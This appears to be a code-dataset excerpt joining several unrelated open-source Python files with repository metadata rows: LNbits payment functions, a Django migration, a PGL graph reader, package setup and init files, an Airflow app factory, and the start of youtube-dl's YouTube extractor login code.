if not internal_checking_id and wallet.balance_msat > -fee_reserve_msat:
raise PaymentFailure(
f"You must reserve at least 1% ({round(fee_reserve_msat/1000)} sat) to cover potential routing fees."
)
raise PermissionError("Insufficient balance.")
if internal_checking_id:
# mark the invoice from the other side as not pending anymore
# so the other side only has access to his new money when we are sure
# the payer has enough to deduct from
async with db.connect() as conn:
await update_payment_status(
checking_id=internal_checking_id, pending=False, conn=conn
)
# notify receiver asynchronously
from lnbits.tasks import internal_invoice_queue
await internal_invoice_queue.put(internal_checking_id)
else:
# actually pay the external invoice
payment: PaymentResponse = await WALLET.pay_invoice(
payment_request, fee_reserve_msat
)
if payment.checking_id:
async with db.connect() as conn:
await create_payment(
checking_id=payment.checking_id,
fee=payment.fee_msat,
preimage=payment.preimage,
pending=payment.ok == None,
conn=conn,
**payment_kwargs,
)
await delete_payment(temp_id, conn=conn)
else:
async with db.connect() as conn:
await delete_payment(temp_id, conn=conn)
raise PaymentFailure(
payment.error_message
or "Payment failed, but backend didn't give us an error message."
)
return invoice.payment_hash
async def redeem_lnurl_withdraw(
wallet_id: str,
lnurl_request: str,
memo: Optional[str] = None,
extra: Optional[Dict] = None,
wait_seconds: int = 0,
conn: Optional[Connection] = None,
) -> None:
if not lnurl_request:
return None
res = {}
async with httpx.AsyncClient() as client:
lnurl = decode_lnurl(lnurl_request)
r = await client.get(str(lnurl))
res = r.json()
try:
_, payment_request = await create_invoice(
wallet_id=wallet_id,
amount=int(res["maxWithdrawable"] / 1000),
memo=memo or res["defaultDescription"] or "",
extra=extra,
conn=conn,
)
except:
print(
f"failed to create invoice on redeem_lnurl_withdraw from {lnurl}. params: {res}"
)
return None
if wait_seconds:
await asyncio.sleep(wait_seconds)
params = {"k1": res["k1"], "pr": payment_request}
try:
params["balanceNotify"] = url_for(
f"/withdraw/notify/{urlparse(lnurl_request).netloc}",
external=True,
wal=wallet_id,
)
except Exception:
pass
async with httpx.AsyncClient() as client:
try:
await client.get(res["callback"], params=params)
except Exception:
pass
async def perform_lnurlauth(
callback: str, conn: Optional[Connection] = None
) -> Optional[LnurlErrorResponse]:
cb = urlparse(callback)
k1 = unhexlify(parse_qs(cb.query)["k1"][0])
key = g().wallet.lnurlauth_key(cb.netloc)
def int_to_bytes_suitable_der(x: int) -> bytes:
"""for strict DER we need to encode the integer with some quirks"""
b = x.to_bytes((x.bit_length() + 7) // 8, "big")
if len(b) == 0:
# ensure there's at least one byte when the int is zero
return bytes([0])
if b[0] & 0x80 != 0:
# ensure it doesn't start with a 0x80 and so it isn't
# interpreted as a negative number
return bytes([0]) + b
return b
def encode_strict_der(r_int, s_int, order):
# if s > order/2 verification will fail sometimes
# so we must fix it here (see https://github.com/indutny/elliptic/blob/e71b2d9359c5fe9437fbf46f1f05096de447de57/lib/elliptic/ec/index.js#L146-L147)
if s_int > order // 2:
s_int = order - s_int
# now we do the strict DER encoding copied from
# https://github.com/KiriKiri/bip66 (without any checks)
r = int_to_bytes_suitable_der(r_int)
s = int_to_bytes_suitable_der(s_int)
r_len = len(r)
s_len = len(s)
sign_len = 6 + r_len + s_len
signature = BytesIO()
signature.write(0x30.to_bytes(1, "big", signed=False))
signature.write((sign_len - 2).to_bytes(1, "big", signed=False))
signature.write(0x02.to_bytes(1, "big", signed=False))
signature.write(r_len.to_bytes(1, "big", signed=False))
signature.write(r)
signature.write(0x02.to_bytes(1, "big", signed=False))
signature.write(s_len.to_bytes(1, "big", signed=False))
signature.write(s)
return signature.getvalue()
sig = key.sign_digest_deterministic(k1, sigencode=encode_strict_der)
async with httpx.AsyncClient() as client:
r = await client.get(
callback,
params={
"k1": k1.hex(),
"key": key.verifying_key.to_string("compressed").hex(),
"sig": sig.hex(),
},
)
try:
resp = json.loads(r.text)
if resp["status"] == "OK":
return None
return LnurlErrorResponse(reason=resp["reason"])
except (KeyError, json.decoder.JSONDecodeError):
return LnurlErrorResponse(
reason=r.text[:200] + "..." if len(r.text) > 200 else r.text
)
async def check_invoice_status(
wallet_id: str, payment_hash: str, conn: Optional[Connection] = None
) -> PaymentStatus:
payment = await get_wallet_payment(wallet_id, payment_hash, conn=conn)
if not payment:
return PaymentStatus(None)
status = await WALLET.get_invoice_status(payment.checking_id)
if not payment.pending:
return status
if payment.is_out and status.failed:
print(f" - deleting outgoing failed payment {payment.checking_id}: {status}")
await payment.delete()
elif not status.pending:
print(
f" - marking '{'in' if payment.is_in else 'out'}' {payment.checking_id} as not pending anymore: {status}"
)
await payment.set_pending(status.pending)
return status
# WARN: this same value must be used for balance check and passed to WALLET.pay_invoice(), it may cause a vulnerability if the values differ
def fee_reserve(amount_msat: int) -> int:
return max(2000, int(amount_msat * 0.01))
| 32.331378
| 155
| 0.613515
|
8c6ffad3da94808f92de7f58938db9565c717324
| 5,457
|
py
|
Python
|
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
ofirr/OpenCommunity
|
7786ac2996530af8f545f4398c071793c73634c8
|
[
"BSD-3-Clause"
] | 1
|
2015-05-12T17:59:35.000Z
|
2015-05-12T17:59:35.000Z
|
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
Niros/OpenCommunity
|
4c91136db6243a1cd65b55ecf5a44c2bce24a45a
|
[
"BSD-3-Clause"
] | null | null | null |
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
Niros/OpenCommunity
|
4c91136db6243a1cd65b55ecf5a44c2bce24a45a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Community.is_public'
db.add_column(u'communities_community', 'is_public',
self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Community.is_public'
db.delete_column(u'communities_community', 'is_public')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'communities.community': {
'Meta': {'object_name': 'Community'},
'board_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'uid': ('django.db.models.fields.CharField', [], {'default': "'t8u2cfggsklf588rxjzo11ho'", 'unique': 'True', 'max_length': '24'}),
'upcoming_meeting_comments': ('ocd.base_models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_guests': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'upcoming_meeting_location': ('django.db.models.fields.CharField', [], {'max_length': '300', 'null': 'True', 'blank': 'True'}),
'upcoming_meeting_participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'+'", 'blank': 'True', 'to': u"orm['users.OCUser']"}),
'upcoming_meeting_published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_scheduled_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_started': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'upcoming_meeting_summary': ('ocd.base_models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_version': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'users.ocuser': {
'Meta': {'object_name': 'OCUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
}
}
complete_apps = ['communities']
| 70.87013
| 197
| 0.584754
|
8839b9355ce7b19065b9bdf6689c2480ccee112b
| 5,143
|
py
|
Python
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 1,389
|
2019-06-11T03:29:20.000Z
|
2022-03-29T18:25:43.000Z
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 232
|
2019-06-21T06:52:10.000Z
|
2022-03-29T08:20:31.000Z
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 229
|
2019-06-20T12:13:58.000Z
|
2022-03-25T12:04:48.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pickle as pkl
import paddle
import paddle.fluid as fluid
import pgl
import time
from pgl.utils import mp_reader
from pgl.utils.logger import log
import time
import copy
def node_batch_iter(nodes, node_label, batch_size):
"""node_batch_iter
"""
perm = np.arange(len(nodes))
np.random.shuffle(perm)
start = 0
while start < len(nodes):
index = perm[start:start + batch_size]
start += batch_size
yield nodes[index], node_label[index]
def traverse(item):
"""traverse
"""
if isinstance(item, list) or isinstance(item, np.ndarray):
for i in iter(item):
for j in traverse(i):
yield j
else:
yield item
def flat_node_and_edge(nodes):
"""flat_node_and_edge
"""
nodes = list(set(traverse(nodes)))
return nodes
def worker(batch_info, graph, graph_wrapper, samples):
"""Worker
"""
def work():
"""work
"""
_graph_wrapper = copy.copy(graph_wrapper)
_graph_wrapper.node_feat_tensor_dict = {}
for batch_train_samples, batch_train_labels in batch_info:
start_nodes = batch_train_samples
nodes = start_nodes
edges = []
for max_deg in samples:
pred_nodes = graph.sample_predecessor(
start_nodes, max_degree=max_deg)
for dst_node, src_nodes in zip(start_nodes, pred_nodes):
for src_node in src_nodes:
edges.append((src_node, dst_node))
last_nodes = nodes
nodes = [nodes, pred_nodes]
nodes = flat_node_and_edge(nodes)
# Find new nodes
start_nodes = list(set(nodes) - set(last_nodes))
if len(start_nodes) == 0:
break
subgraph = graph.subgraph(
nodes=nodes,
edges=edges,
with_node_feat=False,
with_edge_feat=False)
sub_node_index = subgraph.reindex_from_parrent_nodes(
batch_train_samples)
feed_dict = _graph_wrapper.to_feed(subgraph)
feed_dict["node_label"] = np.expand_dims(
np.array(
batch_train_labels, dtype="int64"), -1)
feed_dict["node_index"] = sub_node_index
feed_dict["parent_node_index"] = np.array(nodes, dtype="int64")
yield feed_dict
return work
def multiprocess_graph_reader(graph,
graph_wrapper,
samples,
node_index,
batch_size,
node_label,
with_parent_node_index=False,
num_workers=4):
"""multiprocess_graph_reader
"""
def parse_to_subgraph(rd, prefix, node_feat, _with_parent_node_index):
"""parse_to_subgraph
"""
def work():
"""work
"""
for data in rd():
feed_dict = data
for key in node_feat:
feed_dict[prefix + '/node_feat/' + key] = node_feat[key][
feed_dict["parent_node_index"]]
if not _with_parent_node_index:
del feed_dict["parent_node_index"]
yield feed_dict
return work
def reader():
"""reader"""
batch_info = list(
node_batch_iter(
node_index, node_label, batch_size=batch_size))
block_size = int(len(batch_info) / num_workers + 1)
reader_pool = []
for i in range(num_workers):
reader_pool.append(
worker(batch_info[block_size * i:block_size * (i + 1)], graph,
graph_wrapper, samples))
if len(reader_pool) == 1:
r = parse_to_subgraph(reader_pool[0],
repr(graph_wrapper), graph.node_feat,
with_parent_node_index)
else:
multi_process_sample = mp_reader.multiprocess_reader(
reader_pool, use_pipe=True, queue_size=1000)
r = parse_to_subgraph(multi_process_sample,
repr(graph_wrapper), graph.node_feat,
with_parent_node_index)
return paddle.reader.buffered(r, num_workers)
return reader()
| 32.550633
| 78
| 0.564845
|
ba061a263a4b34fc6395f02806c77c4b9504f927
| 1,257
|
py
|
Python
|
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 United States Government as represented by the Administrator of
# the National Aeronautics and Space Administration. No copyright is claimed in
# the United States under Title 17, U.S. Code. All Other Rights Reserved.
# The Stochastic Reduced Order Models with Python (SROMPy) platform is licensed
# under the Apache License, Version 2.0 (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0.
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
name="target"
from AnalyticRandomVector import AnalyticRandomVector
from BetaRandomVariable import BetaRandomVariable
from GammaRandomVariable import GammaRandomVariable
from NormalRandomVariable import NormalRandomVariable
from RandomVariable import RandomVariable
from RandomVector import RandomVector
from SampleRandomVector import SampleRandomVector
from UniformRandomVariable import UniformRandomVariable
| 44.892857
| 80
| 0.824185
|
0b71c177ad6160aec2ce234b9b5ce20650ba7d3b
| 5,566
|
py
|
Python
|
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import socket
import six
from flask import Flask
from flask_admin import Admin, base
from flask_caching import Cache
from flask_wtf.csrf import CSRFProtect
csrf = CSRFProtect()
import airflow
from airflow import configuration as conf
from airflow import models, LoggingMixin
from airflow.settings import Session
from airflow.www.blueprints import routes
from airflow.logging_config import configure_logging
from airflow import jobs
from airflow import settings
from airflow import configuration
def create_app(config=None, testing=False):
app = Flask(__name__)
app.secret_key = configuration.get('webserver', 'SECRET_KEY')
app.config['LOGIN_DISABLED'] = not configuration.getboolean('webserver', 'AUTHENTICATE')
csrf.init_app(app)
app.config['TESTING'] = testing
airflow.load_login()
airflow.login.login_manager.init_app(app)
from airflow import api
api.load_auth()
api.api_auth.init_app(app)
cache = Cache(
app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})
app.register_blueprint(routes)
configure_logging()
with app.app_context():
from airflow.www import views
admin = Admin(
app, name='Airflow',
static_url_path='/admin',
index_view=views.HomeView(endpoint='', url='/admin', name="DAGs"),
template_mode='bootstrap3',
)
av = admin.add_view
vs = views
av(vs.Airflow(name='DAGs', category='DAGs'))
if not conf.getboolean('core', 'secure_mode'):
av(vs.QueryView(name='Ad Hoc Query', category="Data Profiling"))
av(vs.ChartModelView(
models.Chart, Session, name="Charts", category="Data Profiling"))
av(vs.KnownEventView(
models.KnownEvent,
Session, name="Known Events", category="Data Profiling"))
av(vs.SlaMissModelView(
models.SlaMiss,
Session, name="SLA Misses", category="Browse"))
av(vs.TaskInstanceModelView(models.TaskInstance,
Session, name="Task Instances", category="Browse"))
av(vs.LogModelView(
models.Log, Session, name="Logs", category="Browse"))
av(vs.JobModelView(
jobs.BaseJob, Session, name="Jobs", category="Browse"))
av(vs.PoolModelView(
models.Pool, Session, name="Pools", category="Admin"))
av(vs.ConfigurationView(
name='Configuration', category="Admin"))
av(vs.UserModelView(
models.User, Session, name="Users", category="Admin"))
av(vs.ConnectionModelView(
models.Connection, Session, name="Connections", category="Admin"))
av(vs.VariableView(
models.Variable, Session, name="Variables", category="Admin"))
av(vs.XComView(
models.XCom, Session, name="XComs", category="Admin"))
admin.add_link(base.MenuLink(
category='Docs', name='Documentation',
url='http://pythonhosted.org/airflow/'))
admin.add_link(
base.MenuLink(category='Docs',
name='Github',url='https://github.com/apache/incubator-airflow'))
av(vs.VersionView(name='Version', category="About"))
av(vs.DagRunModelView(
models.DagRun, Session, name="DAG Runs", category="Browse"))
av(vs.DagModelView(models.DagModel, Session, name=None))
# Hack to not add this view to the menu
admin._menu = admin._menu[:-1]
def integrate_plugins():
"""Integrate plugins to the context"""
log = LoggingMixin().log
from airflow.plugins_manager import (
admin_views, flask_blueprints, menu_links)
for v in admin_views:
log.debug('Adding view %s', v.name)
admin.add_view(v)
for bp in flask_blueprints:
log.debug('Adding blueprint %s', bp.name)
app.register_blueprint(bp)
for ml in sorted(menu_links, key=lambda x: x.name):
log.debug('Adding menu link %s', ml.name)
admin.add_link(ml)
integrate_plugins()
import airflow.www.api.experimental.endpoints as e
# required for testing purposes otherwise the module retains
# a link to the default_auth
if app.config['TESTING']:
if six.PY2:
reload(e)
else:
import importlib
importlib.reload(e)
app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')
@app.context_processor
def jinja_globals():
return {
'hostname': socket.getfqdn(),
}
@app.teardown_appcontext
def shutdown_session(exception=None):
settings.Session.remove()
return app
app = None
def cached_app(config=None):
global app
if not app:
app = create_app(config)
return app
| 33.733333
| 92
| 0.630075
|
ed1575d3ea4c589e9f88f13a54e9cba41725f6dd
| 1,068
|
py
|
Python
|
idunn/places/latlon.py
|
QwantResearch/idunn
|
88b6862f1036187855b5541bbb6758ddd4df33c1
|
[
"Apache-2.0"
] | 26
|
2018-11-30T09:17:17.000Z
|
2020-11-07T01:53:07.000Z
|
idunn/places/latlon.py
|
QwantResearch/idunn
|
88b6862f1036187855b5541bbb6758ddd4df33c1
|
[
"Apache-2.0"
] | 38
|
2018-06-08T09:41:04.000Z
|
2020-12-07T17:39:12.000Z
|
idunn/places/latlon.py
|
Qwant/idunn
|
65582dfed732093778bf7c2998db1e2cd78255b8
|
[
"Apache-2.0"
] | 9
|
2018-05-18T13:07:00.000Z
|
2020-08-01T16:42:40.000Z
|
from .address import Address
from .base import BasePlace
from .exceptions import InvalidPlaceId
class Latlon(BasePlace):
PLACE_TYPE = "latlon"
PLACE_ID_NAMESPACE = "latlon"
def __init__(self, lat, lon, closest_address=None):
self.lat = round(float(lat), 5)
self.lon = round(float(lon), 5)
self.closest_address = closest_address or Address({})
super().__init__(self.closest_address)
@classmethod
def from_id(cls, latlon_id):
try:
_namespace, lat, lon = latlon_id.split(":")
except ValueError as exc:
raise InvalidPlaceId(latlon_id) from exc
return cls(lat, lon)
def build_address(self, lang):
if self.closest_address:
return self.closest_address.build_address(lang)
return None
def get_id(self):
return f"{self.PLACE_ID_NAMESPACE}:{self.lat:.5f}:{self.lon:.5f}"
def get_local_name(self):
return f"{self.lat:.5f} : {self.lon:.5f}"
def get_coord(self):
return {"lat": self.lat, "lon": self.lon}
| 28.864865
| 73
| 0.636704
|
fd66fc8c80495c9c32d43febf25a087c071fcd40
| 2,040
|
py
|
Python
|
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
setup.py
|
aleph-im/py-libp2p
|
3dfb5c49abf37fd95db12ae5766757332be70d08
|
[
"Apache-2.0",
"MIT"
] | 2
|
2020-10-13T07:43:55.000Z
|
2020-10-27T08:51:53.000Z
|
import setuptools
py_classifiers = [f"Programming Language :: Python :: {version}" for version in ["3.7"]]
extras_require = {
"test": [
"factory-boy>=2.12.0,<3.0.0",
"pytest>=4.6.3,<5.0.0",
"pytest-asyncio>=0.10.0,<1.0.0",
"pytest-xdist>=1.30.0",
],
"lint": [
"mypy>=0.701,<1.0",
"mypy-protobuf==1.15",
"black==19.3b0",
"isort==4.3.21",
"flake8>=3.7.7,<4.0.0",
"flake8-bugbear",
],
"dev": [
"bumpversion>=0.5.3,<1",
"docformatter",
"setuptools>=36.2.0",
"tox>=3.13.2,<4.0.0",
"twine",
"wheel",
],
}
extras_require["dev"] = (
extras_require["test"] + extras_require["lint"] + extras_require["dev"]
)
with open("./README.md") as readme:
long_description = readme.read()
setuptools.setup(
name="libp2p",
description="libp2p implementation written in python",
version="0.1.2",
long_description=long_description,
long_description_content_type="text/markdown",
maintainer="The Ethereum Foundation",
maintainer_email="snakecharmers@ethereum.org",
url="https://github.com/ethereum/py-libp2p",
license="MIT/APACHE2.0",
platforms=["unix", "linux", "osx"],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
]
+ py_classifiers,
python_requires=">=3.7,<4",
install_requires=[
"pycryptodome>=3.9.2,<4.0.0",
"base58==2.0.1",
"pymultihash>=0.8.2",
"multiaddr>=0.0.8,<0.1.0",
"rpcudp>=3.0.0,<4.0.0",
"lru-dict>=1.1.6",
"protobuf>=3.10.0,<4.0.0",
"coincurve",
"fastecdsa",
"pynacl==1.3.0",
],
extras_require=extras_require,
packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
zip_safe=False,
keywords="libp2p p2p",
)
| 26.493506
| 88
| 0.556373
|
132572c88cf26b5d0d2fa3efc33aa290b3140755
| 137,527
|
py
|
Python
|
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
youtube_dl/extractor/youtube.py
|
inshadsajeev143/utube
|
f3914b06a0eb0f90b0a2326468e792f107968884
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
import itertools
import json
import os.path
import random
import re
import time
import traceback
from .common import InfoExtractor, SearchInfoExtractor
from ..jsinterp import JSInterpreter
from ..swfinterp import SWFInterpreter
from ..compat import (
compat_chr,
compat_kwargs,
compat_parse_qs,
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urlparse,
compat_str,
)
from ..utils import (
clean_html,
error_to_compat_str,
ExtractorError,
float_or_none,
get_element_by_attribute,
get_element_by_id,
int_or_none,
mimetype2ext,
orderedSet,
parse_codecs,
parse_duration,
qualities,
remove_quotes,
remove_start,
smuggle_url,
str_or_none,
str_to_int,
try_get,
unescapeHTML,
unified_strdate,
unsmuggle_url,
uppercase_escape,
url_or_none,
urlencode_postdata,
)
class YoutubeBaseInfoExtractor(InfoExtractor):
"""Provide base functions for Youtube extractors"""
_LOGIN_URL = 'https://accounts.google.com/ServiceLogin'
_TWOFACTOR_URL = 'https://accounts.google.com/signin/challenge'
_LOOKUP_URL = 'https://accounts.google.com/_/signin/sl/lookup'
_CHALLENGE_URL = 'https://accounts.google.com/_/signin/sl/challenge'
_TFA_URL = 'https://accounts.google.com/_/signin/challenge?hl=en&TL={0}'
_NETRC_MACHINE = 'youtube'
# If True it will raise an error if no login info is provided
_LOGIN_REQUIRED = False
_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
